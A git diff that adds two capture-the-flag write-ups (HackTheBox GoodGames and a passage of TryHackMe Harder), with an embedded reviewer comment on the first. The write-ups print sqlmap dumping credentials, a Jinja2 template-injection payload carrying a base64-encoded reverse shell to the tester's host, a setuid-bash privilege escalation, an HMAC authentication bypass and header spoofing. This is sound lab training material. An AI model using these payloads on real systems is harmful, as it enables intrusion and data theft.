diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png new file mode 100644 index 0000000..ebc18b6 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2cd71268f53543bfadfe3ddb6f1f0437a1b04525c56b80ab57ddf5b27462f6dc +size 33138 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp new file mode 100644 index 0000000..0783a6c --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cecedee0998e4323c973e7092970fba07316b43b89aff266d26003577e076e23 +size 29376 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png new file mode 100644 index 0000000..654df92 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4064ccba607fe2db158e2868fc68b7468b529fdce9f260166e0a6f46d5491370 +size 24836 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp new file mode 100644 index 0000000..b83bc70 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8182b28337e3741d694527431b83910f7695decd6252611985d91b8e0b8ff478 +size 13588 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png new file mode 100644 index 0000000..dfd7610 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fbbcf3b2fc788befc7f070348bfaf82a4d5e4b51c30f1c670271ac3e73b7376 +size 16933 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp new file mode 100644 index 0000000..dc6b234 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cff9acbf41bb0206ec3f7dd7df781c1763954c095edecb4888dd61f5be07179a +size 19514 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png new file mode 100644 index 0000000..d90cd8f --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f41812dce889551aea7341503008caf65d9c610690589269ceb36f3f914d1ce +size 32664 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp new file mode 100644 index 0000000..a0418c2 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b552c7fac725cd3d2215c67dd9dc9c0fb1bf72f5572af8cda5e505fa4c2525f0 +size 37834 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png new file mode 100644 index 0000000..5bcfc4b --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85916d7ddd63aff638dc5dbf3780b054f17a5c6a52599d669cedee7042460633 +size 22005 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp new file mode 100644 index 0000000..d197d91 --- /dev/null 
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b927c7cf2dcd507daebd617d71cdeb76f63e94c38e2164ee4a15d530dc92eb8 +size 23990 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png new file mode 100644 index 0000000..3213f2a --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29fbbf1958102f1fec24c7ff566e85cc2bedfa241a6bb76e241f418e073a4726 +size 35870 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp new file mode 100644 index 0000000..82d581f --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f471555ad7b983bf8947bd1704b85f1203fb096f0ffe1e4ea366ab311347ffcc +size 42860 diff --git a/content/writeup-ctf/writeup-goodgames-htb/index.md b/content/writeup-ctf/writeup-goodgames-htb/index.md new file mode 100644 index 0000000..6d713bd --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/index.md 
@@ -0,0 +1,208 @@ +--- +title: "Writeup - GoodGames (HTB)" +date: 2022-03-19 +slug: "writeup-goodgames-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [GoodGames](https://app.hackthebox.com/machines/GoodGames) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.130 +``` +One TCP ports are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.51) + +![](img/image-2.webp) + +## Exploit + +I start by listing the pages accessible through the website. + +![](img/image-3.webp) + +There are a number of pages, but 3 are pages with a form: login, forgot-password and signup. With a form we can potentially make SQL injection. + +First I get a login request via Burp. + + +```bash +POST /login HTTP/1.1 +Host: 10.10.11.130 +Content-Length: 36 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.11.130 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.11.130/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +email=test%40test.fr&password=azerty +``` +I save this request in a "request.txt" file, then I run SQLmap to determine if this form is injection sensitive. + + +```bash +sqlmap -r request.txt +``` +This form is usable, so I use the following command to list the accessible databases: + + +```bash +sqlmap -r request.txt --dbs +[...] +[12:51:20] [INFO] retrieved: main +available databases [2]: +[*] information_schema +[*] main +[...] +``` +I select the database "main" and start to list the different tables. + + +```bash +sqlmap -r request.txt -D main --dump +[...] 
+[12:53:58] [INFO] retrieved: blog +[12:54:30] [INFO] retrieved: blog_comments +[12:55:51] [INFO] retrieved: user +[12:56:20] [INFO] fetching columns for table 'blog' in database 'main' +[12:56:20] [INFO] retrieved: 15 +[...] +``` +I select the "user" table and run the following command to dump the data. + + +```bash +sqlmap -r request.txt -D main -T user --dump +[...] +admin@goodgames.htb +[13:00:19] [INFO] retrieved: 1 +[13:00:23] [INFO] retrieved: admin +[13:00:42] [INFO] retrieved: 2b22337f218b2d82dfc3b6f77e7cb8ec +[...] +``` +Ok, we have the credentials of the admin user! We just need to get the password hash and run john to decrypt it. + +![](img/image-4.webp) + +John quickly finds the password: superadministrator. + +I can now connect and access the admin panel. This panel is accessible via a subdomain, so I add it in my /etc/hosts file: + + +```bash +10.10.11.130 internal-administration.goodgames.htb +``` +I fill in the credentials I found before and connect to the admin panel of the site. + +![](img/image-5.webp) + +In this panel I find a tab where I can customize the account nickname. Let's determine the PHP template used by the site. For that I use the following github: + +[PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF - PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThings![](https://github.com/fluidicon.png) + +{{< github repo="swisskyrepo/PayloadsAllTheThings" >}} + + + +Quickly I determine that the site uses the Jinja2 Template. I will be able to use an injection to execute commands on the server. For that I use the following injection: + +```bash +{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} + +``` +To make a shell reversel it's a bit more complex, I didn't manage to put just the command, so I use the base64 method to avoid that the command is modified during the process. 
+ +To do this I encode my reverse in base64 then I use the following injection to transmit it on the remote server: + + +```bash +{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzEyMzQgMD4mMQo=" | base64 -d | bash').read() }} +``` +![](img/image-6.webp) + +I now have a root shell (I think we are in a docker) and I can get the first flag. + + +```bash +root@3a453ab39d3d:/home/augustus# ls +user.txt +root@3a453ab39d3d:/home/augustus# cat user.txt +dec6a8b304bbe0fdfe4b8c46a3562605 +``` +## Privilege escalation + +As said before, I think we are in a docker. What I can confirm after some research. + +After checking my IP, we can safely say that the IP of the host is 172.19.0.1. + +![](img/image-7.webp) + +So I do an nmap scan on the host IP: + +![](img/image-8.webp) + +The SSH port is open! We can now try to connect to the user augustus to exit the docker. + +I first upgrade my reverse shell with the following command (this is very important for the following). + + +```bash +python -c 'import pty; pty.spawn("/bin/bash")' +``` +I am doing an SSH on the user augustus using the password previously used: + +![](img/image-9.webp) + +I am now in the host machine, interesting thing I notice the nmap file I uploaded in the docker is present in the folder of augustus. But what is even more interesting is that he has kept his root privilege! + +![](img/image-10.webp) + +What I will be able to do is to make a copy of bash. Then in the docker add the execution rights. Then go back to the host and create a bash root. 
+ +To do this, I first copy the bash file from the host machine into the augustus folder: + + +```bash +cp /bin/bash ./ + +``` +Then I go back to the docker and add the following rights: + + +```bash +chown root:root bash +chmod 4777 bash +``` +Finally I go back to the host and run a bash root: + + +```bash +augustus@GoodGames:~$ ./bash -p +bash-5.1# cat /root/root.txt +cat /root/root.txt +702332b6faa16ef1b87c5ae52a2ef3df +``` +I now have control of the host machine and can recover the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Patch forms to avoid sql injection +- Use strong passwords +- Do not use the same password for two different services +- Do not launch dockers with root privilege diff --git a/content/writeup-ctf/writeup-harder-thm/featured.png b/content/writeup-ctf/writeup-harder-thm/featured.png new file mode 100644 index 0000000..8c3dff1 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:36799da84aac35347acc68525496bdde70bbf1b673b15bf94ae7ec9bd4dff506 +size 134338 diff --git a/content/writeup-ctf/writeup-harder-thm/featured.webp b/content/writeup-ctf/writeup-harder-thm/featured.webp new file mode 100644 index 0000000..6a07af1 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d453958c4f40d7a89378b82a96d65a936cd207bb5392b0edc62256fbacfd380e +size 92044 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-1.png b/content/writeup-ctf/writeup-harder-thm/img/image-1.png new file mode 100644 index 0000000..3f948cb --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e7e75b56dbd2b93b3fb0ae599c90e1deb7210aa50b23b30d3a1866b9b3b429b +size 30603 
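Review bot: In writeup-goodgames-htb/index.md the Recommendations list omits the flaw that actually gave code execution, the Jinja2 template injection through the account nickname field of the admin panel. Add an item for it (never render user-supplied input as a template), and consider one for the augustus home directory being shared between the host and the container, since that share is what let a root-owned setuid copy of bash reach the host. Other points in the same hunk: "Let's determine the PHP template used by the site" contradicts the next paragraph, which identifies Jinja2, so "template engine" is the accurate wording. The step described as listing the tables runs `sqlmap -r request.txt -D main --dump`, which dumps the whole database; `--tables` would match the prose. "run john to decrypt it" should read "crack it", because a password hash is not decrypted. The line starting "[PayloadsAllTheThings/README.md at master" is an unclosed link-card leftover that duplicates the `github` shortcode directly below it and should be dropped. The raw HTTP request and the Jinja2 expressions are fenced as `bash`; `http` and `jinja` (or an untagged fence) would highlight correctly. Typos to fix: "One TCP ports are discovered" and "shell reversel". The user.txt and root.txt values are published verbatim, so consider redacting them. The markdown references only the `.webp` images, so check whether the `.png` copy of every image needs to be committed as well.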
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-1.webp b/content/writeup-ctf/writeup-harder-thm/img/image-1.webp new file mode 100644 index 0000000..c4f2601 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4acea638b8f6e6fd3131aee06fbcb51e7e8563f62281d06023b1509781d3d668 +size 31030 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-10.png b/content/writeup-ctf/writeup-harder-thm/img/image-10.png new file mode 100644 index 0000000..8e63d7e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be5386329073711ad7b2faa580df8ac003c7d0b76a22190f3a45a279eb6f0cb9 +size 17465 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-10.webp b/content/writeup-ctf/writeup-harder-thm/img/image-10.webp new file mode 100644 index 0000000..065fca1 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45bff4e0792c81297c9eeae4990cf878f5dc9229e596ba973cb875810ee37e13 +size 11920 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-11.png b/content/writeup-ctf/writeup-harder-thm/img/image-11.png new file mode 100644 index 0000000..f75b10e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38d34bae6f2a0803f157b6331a75758cff19b08466c6d7e37c5426a405daaedd +size 39346 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-11.webp b/content/writeup-ctf/writeup-harder-thm/img/image-11.webp new file mode 100644 index 0000000..f0e441c --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfde33882806e67a9ac1e25a920cac949f711f9e9bd30bc28b31b33c57fd8b61 +size 50372 
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-12.png b/content/writeup-ctf/writeup-harder-thm/img/image-12.png new file mode 100644 index 0000000..6418e8b --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91514aaafd66af19cb0ea3de03ebfe70d9bb259577218c1d97fef0fba73e186a +size 17218 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-12.webp b/content/writeup-ctf/writeup-harder-thm/img/image-12.webp new file mode 100644 index 0000000..3271745 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f694614e0e0732d7e8de15913d2574ee6c12ab5de3d7c32dc472e53d5b983911 +size 14392 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-13.png b/content/writeup-ctf/writeup-harder-thm/img/image-13.png new file mode 100644 index 0000000..436675e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c33168d6a3d5b1ed005f67ac3e554ca49267065ede7cc56d7bd36b0ed1c87208 +size 8041 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-13.webp b/content/writeup-ctf/writeup-harder-thm/img/image-13.webp new file mode 100644 index 0000000..61f7924 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44f59332884ecd7501e53b16b9528c92913d648a43afae4a6b2bcf5942839a7f +size 11458 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-14.png b/content/writeup-ctf/writeup-harder-thm/img/image-14.png new file mode 100644 index 0000000..059f092 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c919cc659de7e89ebcd823cfd8a80bf7f53bf372541ebc5b90fd1147c0deab12 +size 30451 
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-14.webp b/content/writeup-ctf/writeup-harder-thm/img/image-14.webp new file mode 100644 index 0000000..652c2af --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30161c2fc29cc68da2907e7647595b8434a8f83751321e6d91156cedbc8b6d8d +size 42040 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-15.png b/content/writeup-ctf/writeup-harder-thm/img/image-15.png new file mode 100644 index 0000000..acaa4b0 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4bdfbbf428d94100ea98115ecd9dd5d7ab6ddc34a6cf27f0c229ad80a180e215 +size 23158 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-15.webp b/content/writeup-ctf/writeup-harder-thm/img/image-15.webp new file mode 100644 index 0000000..9cfd25a --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adb655583fc89e6ffa1c47bb7ebeb2cd5c4d7c1dfc4cd6d4ff36815e396211fd +size 26578 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-2.png b/content/writeup-ctf/writeup-harder-thm/img/image-2.png new file mode 100644 index 0000000..2c29c69 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c02b672370f91e5afa52ef1472cbaa2d24238ce82ef22e55b86a042c0f31995c +size 46777 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-2.webp b/content/writeup-ctf/writeup-harder-thm/img/image-2.webp new file mode 100644 index 0000000..f8c4e56 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97ff4d7575d2e52eacd2fd9d7c4f9a8c501e64c3eedb9fb67b6ce62a9234fd48 +size 38670 
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-3.png b/content/writeup-ctf/writeup-harder-thm/img/image-3.png new file mode 100644 index 0000000..b993869 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:18f28e19270b9101446204d709dd0fc2c2f7bcd81f0136736c659a39a21074a1 +size 29950 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-3.webp b/content/writeup-ctf/writeup-harder-thm/img/image-3.webp new file mode 100644 index 0000000..7d9f112 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:406833020f4c78d77486ec63445a610f0c5ebdaabee48e19feede1282000fde4 +size 24106 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-4.png b/content/writeup-ctf/writeup-harder-thm/img/image-4.png new file mode 100644 index 0000000..724e66f --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc4d9d618d595b092eed52242324419bcaecc830896dbaa91b7ea8d19aeb427c +size 11902 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-4.webp b/content/writeup-ctf/writeup-harder-thm/img/image-4.webp new file mode 100644 index 0000000..c907798 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce2efee69e85991ea98204a167b18f6767432c48565def71355fa4ef50898c50 +size 8624 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-5.png b/content/writeup-ctf/writeup-harder-thm/img/image-5.png new file mode 100644 index 0000000..3d8dfd2 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e8b32d8fc6de468b7ff7f79666825ee1a045fb64516469d374067617fdeac98 +size 63345 
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-5.webp b/content/writeup-ctf/writeup-harder-thm/img/image-5.webp new file mode 100644 index 0000000..d26986e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d0b9a8fd3cf606a22c0de684c6495979d93f1d609f820885c01612ff83ae98 +size 54260 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-6.png b/content/writeup-ctf/writeup-harder-thm/img/image-6.png new file mode 100644 index 0000000..7fb5c50 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:881375e2851d324138c238f7a2d1598f7f27d71b34d3cd37fe7298b0c55e958b +size 69865 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-6.webp b/content/writeup-ctf/writeup-harder-thm/img/image-6.webp new file mode 100644 index 0000000..2c6b939 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b2e45e023ee91580ba967747c4db3eea0cf6b716ff9eeada9c0e1910754dc5b1 +size 91100 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-7.png b/content/writeup-ctf/writeup-harder-thm/img/image-7.png new file mode 100644 index 0000000..1df206e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44330820f9af9c6903db377aae06cf9c698f634331dd7111dcea7a38f2f44f45 +size 33630 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-7.webp b/content/writeup-ctf/writeup-harder-thm/img/image-7.webp new file mode 100644 index 0000000..6269e56 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7bfedbaa51f6e75b2cf56029e65017aeeb46b2deb3a0bdccb647164e83b773ee +size 29828 
diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-8.png b/content/writeup-ctf/writeup-harder-thm/img/image-8.png new file mode 100644 index 0000000..0e5d98b --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce4759616d5c84c85b2b7f764370ef0190d0b087181686025ca541b1f997bd9f +size 13236 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-8.webp b/content/writeup-ctf/writeup-harder-thm/img/image-8.webp new file mode 100644 index 0000000..6d6c27d --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5d8c66a32f9d50eba3a981b8b04963e577ed46735da689940db5c475db7d172 +size 11020 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-9.png b/content/writeup-ctf/writeup-harder-thm/img/image-9.png new file mode 100644 index 0000000..791836f --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc1347b1dc77aa83bcef771c7b0a575f51fad23a527a78906b437bd5196a7cf6 +size 7764 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-9.webp b/content/writeup-ctf/writeup-harder-thm/img/image-9.webp new file mode 100644 index 0000000..73724fe --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42cd84dbd3d963b90c98a72a5bde2f6abaf62a8348ef4a47e6cd7d4e65213741 +size 6016 diff --git a/content/writeup-ctf/writeup-harder-thm/index.md b/content/writeup-ctf/writeup-harder-thm/index.md new file mode 100644 index 0000000..bdb23a2 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/index.md 
@@ -0,0 +1,217 @@ +--- +title: "Writeup - Harder (THM)" +date: 2022-04-28 +slug: "writeup-harder-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Harder](https://tryhackme.com/room/harder) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.199.197 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.3) +- 80/tcp : HTTP web server (nginx 1.18.0) + +## Exploit + +At first I start by scanning the files on the site. + +![](img/image-2.webp) + +I can't find anything in particular, so I make a query with `curl` to see if I find something interesting in the Header. + +![](img/image-3.webp) + +I find that there is a subdomain: `pwd.harder.local`. When I go to the page I find the following login form: + +![](img/image-4.webp) + +After a few tries with the classic passwords, I find that it is possible to connect with `admin/admin`. Then I get a page with the following message: + + +```bash +extra security in place. our source code will be reviewed soon ... +``` +I scan the subdomain to see if it has anything interesting: + +![](img/image-5.webp) + +There is clearly a Git project folder, so I will download it locally to study it. To do this I use [gitTools](https://github.com/internetwache/GitTools): + +![](img/image-6.webp) + +At first I look at the list of commits, there are 3 of them. + +![](img/image-7.webp) + +The second one is pretty interesting. So I look at the differences. While analyzing the code, I come across the following part: + + +```bash ++ +``` +We learn that it is necessary to have the parameters `h`, `host` et `n`. After some research on the function `hash_hmac`, I found on this [site](https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up/) that it is possible to generate a hash ourselves and to use it for the authentication to the page. 
To do this I first generate a hash with the following commands: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents/tmp/.git] +└─$ php -a +Interactive shell + +php > $secret = hash_hmac('sha256', $_GET['n'], $secret); +PHP Warning: Undefined array key "n" in php shell code on line 1 +PHP Warning: Undefined variable $secret in php shell code on line 1 +php > $secret = hash_hmac('sha256', "d3vyce.fr", false); +php > echo $secret; +d0455abc97030b6f667f0f090493beca091e92c1e8c0e04ae09541afb26380c8 +``` +Can I create the following link: + + +```bash +http://pwd.harder.local/?n[]=1&h=d0455abc97030b6f667f0f090493beca091e92c1e8c0e04ae09541afb26380c8&host=d3vyce.fr +``` +I came across a page with the following content: + +![](img/image-8.webp) + +So I add this new subdomain to the `/etc/hosts` file, then I go to the page. I get the following message: + + +```bash +Your IP is not allowed to use this webservice. Only 10.10.10.x is allowed +``` +To access the page anyway, I add an `X-Forwarded-For` field to my request. + + +```bash +GET /index.php HTTP/1.1 +Host: shell.harder.local +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +X-Forwarded-For: 10.10.10.240 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=eb15g7jblveoceue5ekdjooiqj +Connection: close +``` +I finish on the following page: + +![](img/image-9.webp) + +It is a page that allows to execute commands, after some commands, I look for files related to the user on which the site is executed: `evs`. 
+ +![](img/image-10.webp) + +I find a script `evs-backup.sh` which has the following content: + + +```bash +#!/bin/ash + +# ToDo: create a backup script, that saves the /www directory to our internal server +# for authentication use ssh with user "evs" and password "U6j1brxGqbsUA$pMuIodnb$SZB4$bw14" +``` +So now I can connect to the user via SSH and get the first flag. + +![](img/image-11.webp) + +## Privilege escalation + +I start by running the [linpeas.sh](https://linpeas.sh) script to get an overview of the machine. I find the following files: + +![](img/image-12.webp) + +Looking at the content of the script, I understand that it is used to execute scripts encrypted with gpg, knowing that we have the public key of the root user, it should be possible to create a script, sign it with the root key, then execute it as root! + + +```bash +#!/bin/sh + +if [ $# -eq 0 ] + then + echo -n "[*] Current User: "; + whoami; + echo "[-] This program runs only commands which are encypted for root@harder.local using gpg." + echo "[-] Create a file like this: echo -n whoami > command" + echo "[-] Encrypt the file and run the command: execute-crypted command.gpg" + else + export GNUPGHOME=/root/.gnupg/ + gpg --decrypt --no-verbose "$1" | ash +fi +``` +I start by importing the key with the following command: + +![](img/image-13.webp) + +Then I check that it is well imported with the following command: + + +```bash +harder:~$ gpg --list-key +/home/evs/.gnupg/pubring.kbx +---------------------------- +pub ed25519 2020-07-07 [SC] + 